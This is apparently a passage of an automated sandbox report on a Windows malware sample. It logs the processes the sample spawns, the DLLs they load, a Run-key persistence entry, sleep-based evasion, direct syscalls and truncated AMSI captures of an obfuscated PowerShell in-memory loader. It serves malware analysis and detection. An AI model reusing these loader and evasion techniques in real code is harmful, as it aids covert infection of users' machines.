Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: papirvgts.lnk.3.dr	LNK file: ..\Pictures\sgnehelligdag\nondependable.leu
Source: scramasaxe.lnk.3.dr	LNK file: ..\..\..\..\..\..\..\Windows\resources\0409\adolfe\Reproductory.afl
Source: scramasaxe.lnk0.3.dr	LNK file: ..\..\..\..\Windows\resources\0409\adolfe\Reproductory.afl
Source: papirvgts.lnk0.3.dr	LNK file: ..\Pictures\sgnehelligdag\nondependable.leu

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((nonsignification $Celloer $Ekstratogets), (stendysser @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Gigoloernes = [AppDomain]::CurrentDomain.GetAssemblie
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Almenviden)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Rekonfigurationernes, $false).DefineType($Unde

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_071D792F pushad ; retf 007Dh	5_2_071D7939
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_071D9957 push FFFFFFE8h; ret	5_2_071D9959
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_071DC058 pushfd ; ret	5_2_071DC3A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_086D2809 push 0000001Ch; ret	5_2_086D280B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_086D38E3 pushfd ; ret	5_2_086D38E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_086D10F8 push cs; retf	5_2_086D10FB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_086D597C pushfd ; retf	5_2_086D5985
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_086D3553 push 00000015h; retf	5_2_086D3568
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Code function: 8_2_214C08CD push ecx; mov dword ptr [esp], ecx	8_2_214C08D6

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Mesenterical			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Mesenterical			Jump to behavior

Source: C:\Users\user\Desktop\2024_04_005.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2024_04_005.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Foremasthand.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9898			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Window / User API: threadDelayed 8882			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe TID: 4788	Thread sleep count: 119 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 4788	Thread sleep time: -238000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 4788	Thread sleep count: 8882 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 4788	Thread sleep time: -17764000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe TID: 1136	Thread sleep time: -105000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe TID: 1136	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe TID: 1136	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe TID: 1136	Thread sleep count: 51 > 30	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe TID: 1136	Thread sleep time: -51000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed

Source: powershell.exe, 00000005.00000002.90776401624.000000006AAB7000.00000020.00000001.01000000.0000000A.sdmp	Binary or memory string: KThe Hyper-V Module for Windows PowerShell is not available on this machine.
Source: powershell.exe, 00000005.00000002.90776401624.000000006AAB7000.00000020.00000001.01000000.0000000A.sdmp	Binary or memory string: ."The Hyper-V socket target process has ended."
Source: powershell.exe, 00000005.00000002.90776401624.000000006AAB7000.00000020.00000001.01000000.0000000A.sdmp	Binary or memory string: VirtualMachine

Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtQueryAttributesFile: Direct from: 0x76FD2D8C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtCreateKey: Direct from: 0x76FD2B8C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtSetInformationThread: Direct from: 0x76FD2A6C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtQueryVolumeInformationFile: Direct from: 0x76FD2E4C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtDeviceIoControlFile: Direct from: 0x76FD2A0C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtQuerySystemInformation: Direct from: 0x76FD47EC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtWriteVirtualMemory: Direct from: 0x76FD482C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtCreateUserProcess: Direct from: 0x76FD363C	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtProtectVirtualMemory: Direct from: 0x76FD2EBC	Jump to behavior
Source: C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe	NtClose: Direct from: 0x76FD2A8C
